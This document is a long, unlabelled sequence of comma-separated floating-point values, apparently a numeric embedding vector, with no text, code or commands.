0.015818152576684952, -0.0019652857445180416, -0.010066097602248192, -0.008867752738296986, 0.033033233135938644, 0.025514476001262665, -0.004180511925369501, -0.020351320505142212, 0.06601168215274811, -0.0003440961882006377, 0.007991248741745949, -0.026801839470863342, -0.016105756163597107, 0.01579076237976551, -0.024788619950413704, 0.005447333678603172, -0.017201384529471397, -0.007861142978072166, 0.007737884297966957, -0.01618792861700058, 0.011421939358115196, -0.013051687739789486, 0.017516378313302994, 0.013346138410270214, 0.023172566667199135, 0.006799751427024603, -0.03185543045401573, -0.015475768595933914, 0.03574491664767265, 0.05867096781730652, 0.015681199729442596, 0.052234143018722534, -0.01069608423858881, 0.005515810567885637, 0.009066334925591946, -0.02163868583738804, -0.017393119633197784, -0.028404198586940765, 0.010196203365921974, 0.04604383558034897, -0.00291369017213583, -0.02196737378835678, -0.01716029830276966, 0.01481839083135128, -0.004272955469787121, -0.01509229838848114, -0.017324643209576607, 0.05426105856895447, -0.017447901889681816, 0.004615339916199446, -0.02823985368013382, 0.06557343155145645, -0.0027955675031989813, -0.017119213938713074, -0.016379663720726967, -0.007347566075623035, 0.007662559859454632, -0.026829231530427933, -0.01537990104407072, 0.006012267433106899, -0.00578287011012435, 0.00815559271723032, -0.002170716179534793, 0.03308801352977753, -0.005758903454989195, 0.000021158277377253398, 0.027828993275761604, 0.002242616843432188, 0.008669169619679451, -0.03262237086892128, 0.013517330400645733, 0.021159347146749496, 0.0031002894975245, -0.001708497409708798, -0.022474102675914764, -0.018118975684046745, 0.0036053063813596964, -0.014558178372681141, 0.018146365880966187, -0.0022083783987909555, -0.012668217532336712, 0.0040504056960344315, 0.00019098621851298958, 0.0005396832129918039, -0.008374718949198723, -0.02300822176039219, -0.015681199729442596, -0.036566637456417084, 0.005156307015568018, 0.0219125933945179, -0.003172190161421895, -0.004238717257976532, -0.007648864295333624, -0.016872696578502655, -0.002525083953514695, -0.0019567259587347507, 0.009449806064367294, 0.006679916754364967, 0.006868228316307068, -0.010853581130504608, 0.0009073183173313737, -0.004724903032183647, -0.0038689421489834785, 0.0010126014240086079, -0.012442244216799736, -0.01935155875980854, -0.021707162261009216, 0.012462787330150604, -0.01676313392817974, -0.021556513383984566, -0.0261718537658453, -0.0025524746160954237, -0.0037388361524790525, -0.00026513379998505116, -0.047358591109514236, 0.029253311455249786, -0.008203526958823204, 0.027459217235445976, 0.04913898929953575, -0.021775638684630394, 0.0058958567678928375, 0.03506014868617058, 0.02203585021197796, -0.01268876064568758, 0.019159823656082153, 0.023104090243577957, 0.03919614851474762, -0.025939032435417175, 0.013380376622080803, -0.030869364738464355, 0.007491367869079113, 0.008936229161918163, 0.0026705972850322723, -0.02470644749701023, -0.00740919541567564, -0.010161965154111385, -0.0290615763515234, 0.0254049114882946, -0.004985115025192499, -0.027801601216197014, -0.00476256525143981, 0.03585448116064072, 0.012716151773929596, 0.005146035458892584, -0.003961385693401098, 0.033170185983181, 0.022830182686448097, -0.00938817672431469, -0.03675837442278862, 0.0006629415438510478, -0.0081418976187706, -0.002775024389848113, 0.012271052226424217, 0.008176135830581188, 0.007436586078256369, 0.011997144669294357, -0.030047642067074776, -0.03807312995195389, 0.014640350826084614, 0.010661846026778221, 0.02537752129137516, -0.00885405670851469, 0.029116356745362282, 0.012722998857498169, -0.003961385693401098, 0.007511910516768694, -0.02136477828025818, -0.031417179852724075, -0.01151780690997839, -0.020680008456110954, -0.005960910115391016, 0.011401396244764328, -0.005170002114027739, -0.0017367441905662417, -0.03519710153341293, -0.008046030066907406, 0.0045400154776871204, -0.015462073497474194, 0.0011486992007121444, -0.009484044276177883, -0.0030626272782683372, -0.01124389935284853, -0.010750865563750267, -0.008758189156651497, -0.012736694887280464, 0.0016656994121149182, -0.005057015456259251, -0.023391691967844963, 0.015626417472958565, 0.028404198586940765, 0.027062052860856056, 0.007073658984154463, -0.01524294726550579, -0.008210374973714352, -0.020899135619401932, -0.013318748213350773, 0.03489580377936363, -0.013914496637880802, 0.018694180995225906, 0.052261535078287125, -0.017598550766706467, -0.011072707362473011, 0.0260212030261755, -0.003247514832764864, -0.02498035505414009, 0.011839647777378559, -0.027924859896302223, 0.006642254535108805, -0.019132431596517563, -0.008203526958823204, 0.0011144607560709119, 0.028075508773326874, 0.005344618111848831, -0.027705734595656395, 0.0037593792658299208, -0.010565978474915028, -0.004646154586225748, -0.0021416135132312775, -0.03700489178299904, 0.00938817672431469, 0.004296922590583563, -0.026103375479578972, 0.0070188771933317184, -0.024939268827438354, 0.010887819342315197, 0.011360310018062592, -0.0019584379624575377, -0.028650714084506035, -0.025363825261592865, -0.014832085929811, 0.004478386137634516, 0.010387938469648361, 0.014900563284754753, -0.010702932253479958, 0.019091347232460976, 0.014873172156512737, 0.0060567776672542095, -0.02458319067955017, 0.03544361889362335, 0.0030044219456613064, -0.002718531060963869, -0.013866562396287918, 0.009915447793900967, 0.0009535401477478445, 0.005015929229557514, 0.004485233686864376, -0.00022490366245619953, 0.017625940963625908, -0.0066456785425543785, -0.019159823656082153, -0.02172085829079151, -0.022446712478995323, -0.00018060769070871174, -0.004201055038720369, -0.007737884297966957, 0.005991724785417318, 0.00356422015465796, -0.0029376570601016283, 0.01646183617413044, -0.024774925783276558, -0.01868048496544361, -0.015147079713642597, 0.019666552543640137, -0.018885916098952293, -0.022405626252293587, -0.001361833419650793, -0.007888533174991608, 0.008874599821865559, 0.0007866278174333274, 0.036895327270030975, 0.01153150200843811, 0.039963092654943466, -0.0023932659532874823, -0.025267958641052246, 0.016270099207758904, -0.003047219943255186, 0.004433876369148493, -0.0036874786019325256, -0.03645707666873932, -0.009278613142669201, 0.0225151889026165, 0.006416281219571829, 0.0010014739818871021, 0.016790524125099182, -0.0013678250834345818, 0.008333632722496986, -0.042647384107112885, -0.003783346153795719, -0.006080744322389364, 0.015119688585400581, 0.002307669958099723, -0.014599264599382877, 0.001059679314494133, 0.001854010741226375, 0.01364743709564209, 0.008100811392068863, -0.012455939315259457, -0.019789811223745346, 0.038840070366859436, -0.02465166710317135, -0.028404198586940765, -0.012633979320526123, 0.003506014822050929, 0.036594029515981674, -0.016023583710193634, -0.04579731822013855, 0.002598696621134877, -0.00032697696588002145, -0.011360310018062592, -0.03574491664767265, 0.0038278561551123857, 0.004629035014659166, -0.013092773966491222, -0.0039511146023869514, -0.02622663415968418, 0.007573539856821299, 0.01343515794724226, -0.01746159791946411, 0.025788381695747375, -0.00564591633155942, 0.015955107286572456, 0.008586997166275978, 0.01393503975123167, -0.03207455575466156, 0.0031225443817675114, 0.007731036748737097, -0.0035984585992991924, -0.0027390741743147373, 0.01731094904243946, -0.036402296274900436, -0.003432402154430747, 0.0020816964097321033, 0.017242470756173134, 0.004153121262788773, 0.01209301222115755, -0.008593845181167126, -0.006751817651093006, 0.03486841171979904, 0.007080506533384323, 0.028869841247797012, 0.008025486953556538, 0.020282844081521034, -0.012038230895996094, -0.021008698269724846, -0.031170662492513657, 0.025048833340406418, 0.007039420306682587, -0.02580207772552967, -0.012750389985740185, -0.011326071806252003, -0.014010364189743996, -0.011284985579550266, 0.0008298538741655648, -0.0368131548166275, -0.017694419249892235, 0.01977611519396305, -0.006005419883877039, 0.004563982132822275, 0.01643444411456585, 0.003954538144171238, -0.012942125089466572, 0.00504332035779953, -0.02261105738580227, 0.015174470841884613, 0.004605068359524012, -0.0014645486371591687, 0.05423366650938988, 0.010880972258746624, -0.028869841247797012, -0.0028880112804472446, 0.021378472447395325, -0.016023583710193634, 0.001985828625038266, -0.008949924260377884, 0.01022359449416399, 0.00407779635861516, -0.026760753244161606, 0.00972371269017458, 0.0019310471834614873, 0.012764085084199905, -0.012428549118340015, 0.0017735505243763328, -0.006368347443640232, -0.025706211104989052, -0.018885916098952293, 0.022994527593255043, -0.007066810969263315, 0.01691378280520439, 0.005296684335917234, 0.020734790712594986, 0.0030968657229095697, -0.04398953169584274, 0.010531740263104439, -0.06015006825327873, -0.01494164951145649, 0.031718477606773376, 0.023802554234862328, 0.016626179218292236, -0.024199720472097397, -0.018543532118201256, 0.031691085547208786, 0.025733601301908493, 0.03218412026762962, -0.004950876347720623, -0.006176611874252558, -0.000049431728257332, -0.01902286894619465, -0.029691563919186592, 0.02467905730009079, -0.02318626269698143, -0.013955582864582539, -0.02465166710317135, 0.05867096781730652, -0.0022717195097357035, -0.0038175845984369516, 0.006960671860724688, 0.029472436755895615, 0.00958675891160965, -0.0024223686195909977, -0.0392509326338768, -0.013263965956866741, -0.022775400429964066, -0.00800494384020567, 0.03130761533975601, -0.0025353555101901293, 0.03821008279919624, 0.0007635169313289225, 0.0011983448639512062, 0.007347566075623035, 0.004598220810294151, 0.021255215629935265, -0.02492557466030121, -0.012051925994455814, 0.020433492958545685, -0.0006894763209857047, 0.01663987524807453, 0.004163392819464207, -0.010702932253479958, 0.0018386035226285458, -0.0064299763180315495, 0.016694657504558563, -0.02074848674237728, -0.02714422345161438, 0.012846257537603378, -0.01084673311561346, -0.022748010233044624, 0.0048789759166538715, 0.023227348923683167, 0.024049069732427597, 0.0034067234955728054, -0.01905026100575924, 0.029664171859622, 0.009641541168093681, 0.009093726053833961, 0.006340956315398216, -0.012996906414628029, -0.020803267136216164, -0.02614446170628071, 0.005639068782329559, -0.03927832096815109, -0.015626417472958565, 0.009319699369370937, -0.010025011375546455, -0.017817676067352295, 0.00865547452121973, 0.02854115143418312, -0.008573302067816257, 0.013544721528887749, -0.022282367572188377, -0.018023107200860977, 0.01398297306150198, -0.00583422789350152, 0.006697036325931549, -0.011558892205357552, -0.016050973907113075, -0.03760748729109764, 0.005265870131552219, -0.01222996599972248, 0.028869841247797012, 0.01800941303372383, 0.013955582864582539, 0.03393712639808655, 0.006241665221750736, -0.02278909645974636, -0.025185786187648773, -0.0022717195097357035, 0.0030763226095587015, -0.019365252926945686, 0.022775400429964066, -0.011969753541052341, -0.004605068359524012, -0.02787007950246334, 0.005680155009031296, 0.00938817672431469, 0.0042421407997608185, -0.0015758235240355134, -0.03875789791345596, 0.004885823465883732, 0.009045791812241077, -0.018762657418847084, 0.020762180909514427, 0.029116356745362282, -0.0053069558925926685, -0.014229489490389824, -0.001845451188273728, -0.01051119714975357, -0.03642968460917473, -0.05067287012934685, 0.008758189156651497, -0.019036564975976944, -0.004372247029095888, 0.032512810081243515, 0.01207931712269783, -0.007635169196873903, 0.018885916098952293, -0.0023504679556936026, -0.016954869031906128, -0.007196917198598385, 0.026281416416168213, -0.00356422015465796, -0.0023042461834847927, -0.028376808390021324, -0.026308806613087654, 0.02537752129137516, 0.0052761416882276535, 0.029280701652169228, -0.017721809446811676, 0.019639160484075546, -0.028157681226730347, 0.016968563199043274, 0.0024908455088734627, 0.03158152475953102, -0.005591135006397963, 0.013229727745056152, 0.02166607603430748, 0.039935700595378876, 0.021871507167816162, -0.014873172156512737, -0.011928667314350605, 0.01822853833436966, 0.013626893982291222, -0.025541866198182106, 0.020638924092054367, -0.013811781071126461, -0.03380017355084419, 0.011319223791360855, 0.026829231530427933, 0.0006582337664440274, -0.035772308707237244, -0.028924621641635895, -0.020556751638650894, -0.016954869031906128, 0.011463024653494358, 0.0015107705257833004, 0.0028212463948875666, 0.0016451564151793718, 0.022378236055374146, 0.014476006850600243, 0.02398059330880642, 0.0030814583878964186, 0.003151647048071027, -0.005532929673790932, -0.015612722374498844, -0.004023015033453703, 0.025158395990729332, -0.0027373621705919504, -0.038237474858760834, -0.026979880407452583, 0.010353700257837772, -0.012072469107806683, -0.026377283036708832, -0.02410385198891163, -0.007785818073898554, 0.01588662900030613, -0.02589794620871544, -0.0037491077091544867, 0.01153150200843811, 0.025555560365319252, -0.010860429145395756, -0.0006890483200550079, 0.014914258383214474, -0.02443254180252552, 0.006539539434015751, 0.007840599864721298, -0.02854115143418312, -0.005611678119748831, -0.0017050736350938678, -0.009326547384262085, -0.01576337218284607, 0.006457366980612278, -0.048098139464855194, -0.0014722523046657443, -0.014996430836617947, -0.01618792861700058, 0.009710017591714859, 0.015448377467691898, -0.02181672491133213, -0.02495296485722065, 0.028732886537909508, -0.0065224203281104565, -0.035306666046381, -0.009299156256020069, 0.02671966701745987, 0.04133262857794762, 0.009764798916876316, -0.03160891681909561, -0.0015741116367280483, -0.005259022116661072, 0.014421225525438786, 0.027760514989495277, 0.007943314500153065, 0.008949924260377884, 0.015147079713642597, 0.015051212161779404, -0.01480469573289156, -0.0038483990356326103, 0.001314755529165268, -0.017721809446811676, -0.018242234364151955, -0.017694419249892235, -0.029691563919186592, 0.018666790798306465, 0.015174470841884613, 0.02066631428897381, -0.007012029644101858, 0.008114507421851158, -0.022967135533690453, 0.012770933099091053, 0.009511434473097324, -0.03177325800061226, -0.023254739120602608, 0.0010134574258700013, 0.007737884297966957, -0.02525426261126995, -0.006364923436194658, 0.00994968693703413, -0.0028845875058323145, 0.025569256395101547, 0.0041188825853168964, 0.0231314804404974, 0.0014363019727170467, -0.008066573180258274, -0.0039134519174695015, 0.0017324644140899181, -0.009757951833307743, -0.03308801352977753, 0.009867514483630657, -0.005348042119294405, -0.01685900054872036, 0.021186737343668938, 0.008477434515953064, -0.01643444411456585, 0.01716029830276966, -0.0016023583011701703, -0.015174470841884613, 0.04094915837049484, 0.011736932210624218, -0.008696559816598892, 0.0076831029728055, -0.02684292569756508, -0.005156307015568018, -0.006563506089150906, -0.03122544474899769, -0.011723237112164497, 0.011682150885462761, 0.005310379900038242, 0.01944742538034916, -0.004492081701755524, -0.0273907408118248, -0.015284033492207527, 0.028102900832891464, 0.016804220154881477, 0.03900441527366638, -0.004183935467153788, 0.010230441577732563, -0.013298205099999905, 0.003506014822050929, 0.00027198149473406374, 0.03947005793452263, -0.03185543045401573, 0.005166578572243452, -0.0191735178232193, -0.005313803907483816, -0.0014739641919732094, 0.015434682369232178, 0.017845068126916885, 0.022569971159100533, -0.014654045924544334, 0.01865309476852417, -0.014352748170495033, 0.03045850433409214, -0.015174470841884613, -0.007114744745194912, 0.001778686186298728, 0.0069058905355632305, 0.037963565438985825, 0.013414615765213966, 0.012928429991006851, 0.024542104452848434, 0.016749437898397446, -0.014366443268954754, 0.00458110123872757, -0.0024394879583269358, 0.007107897195965052, -0.009983925148844719, 0.025267958641052246, -0.005461028777062893, -0.00824461318552494, 0.0003886061313096434, -0.00384497526101768, 0.003776498371735215, 0.006960671860724688, -0.006121830549091101, -0.040483515709638596, -0.032211512327194214, 0.004146273247897625, -0.03240324556827545, -0.020241757854819298, -0.004293498583137989, 0.008025486953556538, 0.025884250178933144, 0.0038073130417615175, -0.021611293777823448, -0.009703169576823711, -0.01396927796304226, 0.015859238803386688, -0.014284271746873856, -0.01236691977828741, 0.01785876229405403, 0.029828516766428947, 0.016598789021372795, 0.03889485076069832, 0.057739682495594025, 0.020488273352384567, -0.019406339153647423, 0.02403537556529045, -0.009990773163735867, 0.02069370448589325, -0.021885201334953308, 0.013839172199368477, -0.0017367441905662417, 0.008032334968447685, 0.0035094385966658592, -0.0037456839345395565, 0.030348941683769226, 0.011202813126146793, 0.016968563199043274, 0.011798561550676823, -0.02211802266538143, 0.01728355698287487, -0.025569256395101547, 0.022926049306988716, -0.010723475366830826, -0.026692276820540428, 0.027911165729165077, 0.01746159791946411, 0.03810052201151848, 0.010025011375546455, 0.021433254703879356, 0.033334530889987946, -0.027130529284477234, -0.0002006157737923786, 0.000664225488435477, -0.013880257494747639, 0.003684054594486952, 0.015064907260239124, -0.022254977375268936, 0.015051212161779404, 0.02848637104034424, -0.0053754327818751335, -0.04796118661761284, -0.014558178372681141, -0.0029941503889858723, 0.01424318552017212, 0.010723475366830826, 0.00953882560133934, 0.043195199221372604, 0.020282844081521034, 0.004159968812018633, -0.021529123187065125, 0.0020046597346663475, 0.022227585315704346, -0.0035094385966658592, 0.0026055441703647375, 0.026390979066491127, 0.026089681312441826, 0.005337770562618971, 0.012038230895996094, -0.009922295808792114, 0.022802792489528656, 0.01480469573289156, -0.019858287647366524, 0.022652143612504005, 0.00582738034427166, 0.022378236055374146, -0.0392509326338768, -0.030732411891222, -0.009018401615321636, -0.02574729733169079, -0.01042217668145895, -0.01868048496544361, -0.0033878921531140804, 0.012880495749413967, -0.004382518585771322, -0.0074160429649055, 0.002858908614143729, 0.028048118576407433, 0.007443433627486229, -0.04420865699648857, -0.005683578550815582, 0.023651905357837677, -0.03160891681909561, 0.0011649624211713672, -0.005156307015568018, 0.012401157990098, 0.007053115870803595, -0.0156675036996603, 0.0009073183173313737, 0.003752531483769417, 0.018023107200860977, -0.030047642067074776, -0.00500565767288208, 0.007826903834939003, -0.02425450086593628, 0.015256642363965511, 0.01731094904243946, 0.011784866452217102, -0.013674827292561531, 0.01267506554722786, 0.026801839470863342, -0.005940367002040148, -0.006946976762264967, -0.004368823021650314, -0.013414615765213966, -0.0077789705246686935, -0.0024103852920234203, 0.007840599864721298, 0.001221455866470933, -0.014311661943793297, -0.011928667314350605, -0.00542336655780673, -0.005406247451901436, -0.0024976932909339666, 0.005786294117569923, 0.017694419249892235, -0.017776591703295708, 0.002975319279357791, -0.01309962198138237, -0.00025250838370993733, -0.004676968790590763, 0.01746159791946411, -0.0019909644033759832, 0.0021313419565558434, 0.00034559410414658487, -0.012996906414628029, 0.015585331246256828, 0.009408719837665558, -0.0030660510528832674, 0.0241860244423151, 0.0007622329867444932, -0.011449329555034637, 0.014777304604649544, 0.0020782724022865295, -0.026034899055957794, -0.0008444052073173225, -0.016530312597751617, -0.007059963420033455, -0.012387462891638279, 0.030924146994948387, 0.0022973984014242887, 0.009175898507237434, 0.02002263069152832, 0.011962906457483768, 0.026062289252877235, 0.007895381189882755, 0.014229489490389824, -0.013181794434785843, -0.009121117182075977, 0.007594082970172167, 0.01564011350274086, -0.026267720386385918, -0.0261718537658453, 0.00486185634508729, -0.019433731213212013, 0.039113979786634445, -0.002437775954604149, -0.017571160569787025, 0.004468114580959082, -0.014832085929811, -0.038292255252599716, 0.02102239429950714, -0.011798561550676823, 0.00841580517590046, 0.022706924006342888, -0.007984400726854801, -0.013606350868940353, -0.01783137209713459, 0.019817201420664787, -0.00398535281419754, -0.029527219012379646, 0.05987615883350372, -0.006399161648005247, -0.008121354505419731, 0.010839886032044888, 0.01840657740831375, 0.009579911828041077, 0.01603727787733078, -0.009169050492346287, 0.015982497483491898, -0.011449329555034637, 0.02026914805173874, 0.016393357887864113, -0.005734936334192753, -0.009874362498521805, -0.017913544550538063, 0.004519472364336252, -0.016571398824453354, 0.0064984532073140144, -0.013476244173943996, -0.014380139298737049, -0.010963143780827522, 0.0049063665792346, -0.012716151773929596, 0.016174232587218285, 0.0193241685628891, -0.048098139464855194, -0.034128863364458084, -0.002124494407325983, 0.010264679789543152, 0.004844737239181995, 0.000004206244284432614, -0.022282367572188377, -0.033581048250198364, 0.03516970947384834, -0.0023247890640050173, 0.02500774711370468, -0.009121117182075977, -0.002701411722227931, -0.01874896138906479, 0.004711207468062639, 0.01469513215124607, 0.018488749861717224, -0.0048002274706959724, -0.023925812914967537, 0.039086587727069855, -0.014654045924544334, -0.0013096197508275509, 0.015845542773604393, 0.009189593605697155, -0.010415329597890377, 0.014996430836617947, 0.003125968389213085, -0.01328450907021761, -0.004605068359524012, -0.006015691440552473, -0.0035916108172386885, 0.020529359579086304, -0.004666697699576616, 0.015845542773604393, 0.0010939177591353655, -0.0003460221050772816, -0.0007759283180348575, -0.02440514974296093, -0.02614446170628071, -0.008525367826223373, 0.004974843468517065, 0.0038278561551123857, 0.008676017634570599, 0.03371800109744072, -0.03349887579679489, 0.013428310863673687, -0.010387938469648361, 0.0056048305705189705, -0.03369061276316643, 0.006546386983245611, 0.006156069226562977, -0.02239193022251129, -0.010312614031136036, 0.019036564975976944, 0.027828993275761604, -0.026432065293192863, -0.016571398824453354, 0.026637496426701546, 0.000664225488435477, -0.015831848606467247, -0.004252412356436253, -0.007703646086156368, -0.07483150064945221, -0.0014782440848648548, -0.0015587043017148972, -0.005372009240090847, 0.02854115143418312, -0.01902286894619465, -0.008628083392977715, 0.016544006764888763, 0.0010091776493936777, 0.0060567776672542095, -0.013722761534154415, 0.015284033492207527, 0.016201622784137726, 0.02532273903489113, -0.02293974533677101, 0.020460883155465126, 0.023117784410715103, -0.0028315179515630007, -0.006406009662896395, 0.016229014843702316, 0.010429024696350098, 0.015571636147797108, -0.014722523279488087, -0.015147079713642597, 0.03831964731216431, 0.01688639260828495, -0.009408719837665558, -0.014434920623898506, 0.018981782719492912, 0.008087116293609142, -0.035498399287462234, -0.007909076288342476, -0.015393596142530441, 0.00398535281419754, -0.006299870554357767, 0.016598789021372795, 0.009566215798258781, 0.025267958641052246, -0.022802792489528656, -0.0222138911485672, 0.01700964942574501, -0.03730618953704834, -0.012099860236048698, -0.011100097559392452, 0.006686764769256115, 0.020310234278440475, 0.01226420421153307, 0.02391211688518524, 0.02829463593661785, -0.004040134139358997, 0.025637732818722725, 0.00001307346155954292, 0.0014363019727170467, 0.003769650822505355, 0.009408719837665558, 0.0029992861673235893, 0.011510958895087242, -0.01495534460991621, 0.016393357887864113, 0.0035436770413070917, 0.025021441280841827, -0.01633857749402523, -0.004187359474599361, -0.012805171310901642, -0.012784628197550774, -0.003172190161421895, 0.03462189808487892, 0.006943552754819393, 0.004468114580959082, 0.028349416330456734, 0.013222879730165005, -0.02787007950246334, 0.020433492958545685, -0.014188404195010662, -0.005163154564797878, -0.0076077780686318874, 0.009333395399153233, 0.00463245902210474, 0.022953441366553307, 0.012750389985740185, 0.007422890979796648, 0.011250746436417103, -0.0035916108172386885, 0.005707545671612024, -0.0007006038213148713, -0.015462073497474194, 0.03155413269996643, -0.01892700232565403, 0.00727224163711071, -0.0007237147074192762, 0.00047677007387392223, 0.025719905272126198, -0.023323215544223785, -0.013037992641329765, -0.012284747324883938, 0.0006376907113008201, -0.00034345421590842307, 0.019063955172896385, 0.0009158778702840209, -0.02328212931752205, -0.007600930519402027, -0.007477672304958105, 0.015201861038804054, 0.024021679535508156, -0.003036948386579752, 0.008908838033676147, -0.004255836363881826, -0.009833276271820068, -0.005300108343362808, -0.002371011069044471, 0.004444147925823927, 0.02614446170628071, 0.006779208313673735, 0.03174586966633797, 0.009531977586448193, -0.015557941049337387, -0.015284033492207527, -0.014708828181028366, 0.011887581087648869, -0.04763249680399895, 0.03327975049614906, 0.008970467373728752, -0.010757713578641415, 0.0018146366346627474, 0.006375194992870092, -0.005515810567885637, 0.004618763457983732, -0.004567406140267849, -0.03486841171979904, 0.014708828181028366, 0.006138949654996395, 0.006039658561348915, -0.009429262951016426, 0.01352417841553688, -0.02826724387705326, -0.005837651435285807, 0.012907886877655983, 0.0023624515160918236, 0.012332680635154247, -0.029006794095039368, -0.007758427411317825, -0.0011461313115432858, 0.010333157144486904, 0.013339290395379066, -0.008997858501970768, -0.026582714170217514, 0.007148983422666788, -0.002709971508011222, -0.004902942571789026, -0.009484044276177883, 0.013839172199368477, -0.000699319876730442, 0.012798323296010494, -0.012120402418076992, 0.009408719837665558, -0.023624513298273087, 0.023419084027409554, 0.004653002135455608, 0.009867514483630657, 0.008751342073082924, -0.00740919541567564, -0.02403537556529045, 0.003035236382856965, -0.01685900054872036, -0.02020067162811756, 0.006426552776247263, -0.011949210427701473, -0.004940604791045189, -0.008258308283984661, -0.010744018480181694, -0.0025507628452032804, 0.020310234278440475, -0.0010476958705112338, 0.005998572334647179, -0.010107183828949928, 0.010538587346673012, -0.005916399881243706, -0.007991248741745949, 0.017598550766706467, 0.0176533330231905, 0.01413362193852663, 0.022405626252293587, -0.004611915908753872, 0.012709303759038448, 0.006936705205589533, -0.025884250178933144, -0.0014491414185613394, -0.008628083392977715, 0.017297253012657166, 0.012360071763396263, 0.021871507167816162, 0.0063854665495455265, -0.007285937201231718, -0.017091821879148483, 0.00005681438778992742, -0.014886867254972458, -0.004348279908299446, 0.007285937201231718, 0.0026175277307629585, -0.013681675307452679, -0.014065145514905453, -0.019762419164180756, 0.0071900696493685246, -0.031718477606773376, -0.01832440495491028, 0.005906128324568272, 0.011189118027687073, 0.0076831029728055, 0.006080744322389364, -0.01889961212873459, -0.01676313392817974, -0.010593368671834469, -0.03462189808487892, -0.0067141554318368435, 0.028157681226730347, -0.006529267877340317, -0.0007973273750394583, 0.0020029479637742043, -0.0072790891863405704, -0.018598312512040138, 0.010894667357206345, 0.001648580189794302, 0.039963092654943466, 0.006118406541645527, -0.002264871960505843, -0.01600988768041134, 0.02988329902291298, 0.0029496403876692057, -0.009518282487988472, -0.011161726899445057, -0.003714869264513254, 0.020529359579086304, 0.004012743476778269, 0.005594559013843536, -0.0002822530223056674, -0.02102239429950714, -0.0000511169018864166, 0.007648864295333624, 0.02246040664613247, 0.004231869243085384, -0.004238717257976532, 0.010175660252571106, 0.0025456270668655634, -0.01743420585989952, -0.0009509722585789859, 0.0251036137342453, 0.028979403898119926, 0.001361833419650793, 0.01524294726550579, 0.002583289286121726, -0.010264679789543152, 0.005878737661987543, 0.00010057538020191714, 0.0017435918562114239, 0.0011144607560709119, -0.014722523279488087, 0.0032851770520210266, -0.007635169196873903, -0.008895142935216427, 0.005125492345541716, -0.009579911828041077, -0.0008602404850535095, -0.0018796896329149604, -0.008936229161918163, -0.004026439040899277, 0.004279803484678268, 0.021200433373451233, 0.007457129191607237, -0.003940843045711517, 0.009244374930858612, 0.0025576103944331408, -0.014845781959593296, -0.00356422015465796, -0.016420749947428703, -0.019885677844285965, 0.005303532350808382, 0.026089681312441826, 0.0008161584846675396, 0.005752055440098047, 0.007231155410408974, -0.0021981068421155214, -0.008128202520310879, -0.0015484328614547849, 0.010059249587357044, 0.0013729608617722988, 0.020433492958545685, 0.009730560705065727, 0.010990534909069538, -0.015325119718909264, 0.008833513595163822, -0.021803028881549835, 0.00768995052203536, 0.016229014843702316, 0.012099860236048698, 0.002377858618274331, 0.015448377467691898, 0.012223117984831333, -0.007203764747828245, -0.011469872668385506, -0.012483330443501472, 0.0068476852029562, -0.00823091808706522, -0.01222996599972248, 0.009381328709423542, 0.013174946419894695, -0.01922830007970333, 0.014722523279488087, -0.0031311041675508022, -0.004902942571789026, -0.010449567809700966, -0.004043558146804571, -0.03264976292848587, -0.009545673616230488, 0.0027767363935709, -0.02537752129137516, -0.014311661943793297, -0.025391217321157455, -0.001286508864723146, 0.026527931913733482, 0.008477434515953064, -0.007717341184616089, 0.011825952678918839, 0.0005362593219615519, 0.024473626166582108, -0.000223191746044904, -0.009374480694532394, 0.004735174123197794, -0.03810052201151848, 0.006703883875161409, -0.013291357085108757, -0.006967519875615835, 0.028458978980779648, 0.0026072561740875244, -0.022049546241760254, 0.007080506533384323, 0.00038004652014933527, 0.00871710292994976, 0.015256642363965511, -0.019680246710777283, -0.016776828095316887, -0.015420987270772457, 0.00698463898152113, -0.0014577009715139866, -0.011367157101631165, -0.022926049306988716, -0.006799751427024603, 0.03615577891469002, 0.01480469573289156, 0.029472436755895615, -0.01200399175286293, -0.00002491648046998307, 0.007642016746103764, 0.004331160802394152, -0.010757713578641415, -0.024747533723711967, 0.006864804308861494, 0.014859477058053017, 0.027650952339172363, 0.01355841662734747, -0.0021005275193601847, -0.006823718547821045, 0.010518044233322144, -0.0193241685628891, 0.002259736182168126, 0.0018197722965851426, 0.023569732904434204, -0.025391217321157455, 0.015749676153063774, -0.00011437774082878605, 0.01862570457160473, -0.011421939358115196, 0.0038483990356326103, 0.003370773047208786, 0.008491129614412785, 0.014571874402463436, -0.0008533927612006664, 0.010072944685816765, 0.01646183617413044, 0.012325833551585674, 0.004183935467153788, 0.011620521545410156, 0.011730085127055645, -0.009073182940483093, -0.005022777244448662, -0.007799513638019562, -0.02157020755112171, -0.0031807497143745422, 0.017940934747457504, 0.013873410411179066, 0.00940187182277441, 0.0030865941662341356, -0.007621473632752895, 0.005170002114027739, -0.009306004270911217, -0.007861142978072166, -0.002792143728584051, -0.006340956315398216, 0.0031533590517938137, -0.002509676618501544, 0.002718531060963869, 0.010333157144486904, 0.0015484328614547849, 0.002103951293975115, 0.005803413223475218, 0.009237526915967464, -0.0014619807479903102, 0.01892700232565403, 0.0010091776493936777, -0.008621235378086567, -0.0030677630566060543, -0.004146273247897625, 0.011031621135771275, 0.004666697699576616, -0.019735028967261314, 0.006186883430927992, -0.013072230853140354, 0.008532215841114521, -0.016516616567969322, 0.009230679832398891, 0.024788619950413704, 0.00192248763050884, 0.008867752738296986, 0.003161918604746461, 0.032485418021678925, 0.030102424323558807, 0.00005488847818924114, -0.04215434938669205, 0.006816870532929897, -0.02550077997148037, -0.0028982828371226788, 0.017968326807022095, -0.0038757899310439825, -0.0031396637205034494, 0.00032312513212673366, 0.02766464836895466, 0.0024805739521980286, 0.0003261210222262889, -0.021337388083338737, 0.035553183406591415, 0.004516048356890678, -0.00028182505047880113, -0.005803413223475218, -0.00023902700922917575, -0.007203764747828245, 0.021351082250475883, 0.0011461313115432858, -0.0020371864084154367, 0.01643444411456585, 0.00342726637609303, 0.00824461318552494, 0.008525367826223373, -0.0019550141878426075, -0.019680246710777283, -0.035498399287462234, -0.0031995808240026236, 0.01937894895672798, -0.011079554446041584, 0.008299394510686398, 0.02069370448589325, -0.00699833407998085, -0.004454419016838074, 0.003242379054427147, 0.023775162175297737, -0.01425688061863184, -0.0036018823739141226, -0.0009852107614278793, 0.000274121412076056, -0.009271766059100628, -0.0036772070452570915, 0.01807788945734501, 0.01095629669725895, -0.006406009662896395, 0.0034632168244570494, 0.001978981075808406, 0.015133384615182877, 0.00856645405292511, 0.02881505899131298, 0.014366443268954754, 0.00838156696408987, -0.022926049306988716, -0.003940843045711517, -0.001740167965181172, -0.009210136719048023, 0.0030660510528832674, -0.003083170158788562, -0.006258784327656031, -0.006738122086971998, -0.010312614031136036, 0.013339290395379066, 0.008669169619679451, -0.010463262908160686, 